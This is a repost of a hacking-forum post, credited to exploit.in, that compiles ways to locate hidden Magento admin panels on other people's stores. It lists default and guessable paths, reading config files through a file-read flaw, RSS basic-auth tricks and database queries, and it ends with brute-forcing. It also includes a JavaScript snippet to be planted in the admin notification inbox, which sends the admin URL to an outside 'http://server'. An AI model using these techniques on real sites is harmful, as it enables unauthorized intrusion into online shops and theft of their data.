Join
B
@blackhunt
February 19

Finding the path to the Magento admin panel

With enviable regularity, I see more and more new topics on finding a way to the Magenta admin panel, so I will collect everything that I have seen before on this forum.

1. One of the default paths if the admin has special needs (thanks kingdomecome #comment-1099896)

httpx://{base_url}/catalog/Adminhtml_category

2. If it is possible to read files on the host, read this file (thanks to secnull #comment-1099846)

/app/etc/local.xml

2.1 As an addition to the previous paragraph (thanks to fout #comment-1299309)

The admin panel name is set in the config usually app/etc/local.xml or app/etc/env.php

 in the line 'backend' => 'frontName' => '[frontName]'

 Admin access: http://hostname/index.php/[frontName]/

tells us 3. And here is what the user winstrool , thanks to him for this (#comment-1100049)

try looking at the paths:
 /rss/catalog/notifystock/
 index.php/rss/catalog/notifystock/

 If rss is enabled, then a basic authorization will pop up there, the login pass is the same as from the admin panel, you go through authorization, there you look at the source code of the page, the path to the admin panel will be written in it

4. If the administrator of the resource is a radish (a bad person) and changed the path to the admin area to a custom one, it makes sense to look in the database.
From personal experience, I have written down the following search anchors:

core_config
-T core_config_data --where="path='admin/url/use_custom'" -C value

и
cms_page

5. In any case, it is worth checking this path, which I have repeatedly mentioned on the forum pages:

/downloader

 We look for the inscription return to admin and go to the authorization page

6. I didn’t check it myself, but there was this information on the forum (thanks to gcclub #comment-814214)

There is an admin notification inbox table in Magento (something like this)
 there in it the read notice of the hectic zhs

 var xhr = new XMLHttpRequest();
 xhr.open("POST", "http://server", true);
 xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
 xhr.send(window.location.href);

 this post request code will send the full admin URL

7. There was this topic ( /topic/126409/ ) from which we can learn a lot of useful things if we read letters with our eyes and think thoughts with our brains (thanks to 0M0H for starting the thread):

basic moments:
 1. Searching /admin, /manager, /backend, /office
 3. /index.php/rss/order/new/, we go through authorization using HTTP Basic Auth, after which we click on the order link, cookies are set, you will be in the admin panel, and even logged in, it happens that the xml is not readable in the link text view, extract the url from the “href” of the “a” tag yourself

And this is what the path to the admin panel looks like during the installation of Magenta:

You can try to bruteforce, hehe, there are no options at all - 36^6, EMNIP.

That's all in my notes, perhaps something has escaped my attention.
If the moderators deem it necessary, please pin this topic to make it easier to find information.

Author: FHT
Source : https://forum.exploit.in/topic/225568/

@blackhunt
February 19, 04:20
0 views
0 reactions